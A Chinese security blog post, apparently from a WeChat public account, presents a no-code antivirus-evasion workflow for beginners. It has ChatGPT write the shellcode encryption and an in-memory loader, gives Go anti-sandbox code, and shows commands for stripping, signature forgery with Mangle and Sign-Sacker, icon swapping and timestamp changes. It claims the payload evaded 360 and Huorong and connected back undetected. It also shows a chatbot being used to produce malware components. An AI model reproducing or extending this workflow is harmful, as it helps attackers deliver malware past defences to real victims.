脚本小子福音!不用写一行代码的免杀
免责声明:
本公众号致力于安全研究和红队攻防技术分享等内容,本文中所有涉及的内容均不针对任何厂商或个人,同时由于传播、利用本公众号所发布的技术或工具造成的任何直接或者间接的后果及损失,均由使用者本人承担。请遵守中华人民共和国相关法律法规,切勿利用本公众号发布的技术或工具从事违法犯罪活动。最后,文中提及的图文若无意间导致了侵权问题,请在公众号后台私信联系作者,进行删除操作。
2024年了不会还有人自己手撸加密代码吧,直接上ChatGPT
然后再让ChatGPT写个解密
然后是加载shellcode到内存中
具体的代码还需要调试,这里就不多赘述
如果需要反沙箱,这里提供个例子
// 进程 func checkprocess() { executablePath, err := os.Executable() if err != nil { // 处理错误 return }
sourceFilename := filepath.Base(executablePath) // 源文件名称 processName := filepath.Base(os.Args[0]) // 当前运行进程名称
// 比较源文件名称和进程名称是否相同 if strings.EqualFold(sourceFilename, processName) { // 进程名称和源文件名称相同,正常运行 // 在这里执行正常的操作 } else { // 进程名称和源文件名称不同,可能在沙箱环境中运行 // 在这里执行相应的防沙箱操作 os.Exit(0) // 退出程序 } }x0;
具体参考ChatGPT,这不是本文章的重点
最后编译:
go build -ldflags "-s -w -H=windowsgui" -o decode.exe decode.go
使用项目go-strip
注意此项目未更新,因此最高只能支持到go1.18编译的文件
使用:
go-strip.exe -f decode.exe -a -output decode_new.exe
前后对比:
使用项目Mangle
注意此项目也可以伪造签名
使用:
Mangle.exe -I decode_new.exe -M -O decode_out.exe
借用Github的图:
前后对比:
使用项目Sign-Sacker
使用方法:
python Sign-Sacker.py
这里我使用的是office安装包的签名
使用项目ChangeTimestamp
有人说改时间戳+压缩包,可以规避杀软的扫描,实测好像没什么区别
具体操作看README吧
360安全卫士 14.0.1.1005
火绒 5.0.75.1 病毒库 2024-01-02
一个仅替换图标 一个替换图标以及带签名
物理机开启http服务,均落地未被杀(有的时候会出现仅修改图标的被杀,问题不大)
正常上线未告警
后台回复“加群”或“小助手”,或扫描下方二维码加入我们的付费圈子,一起进步吧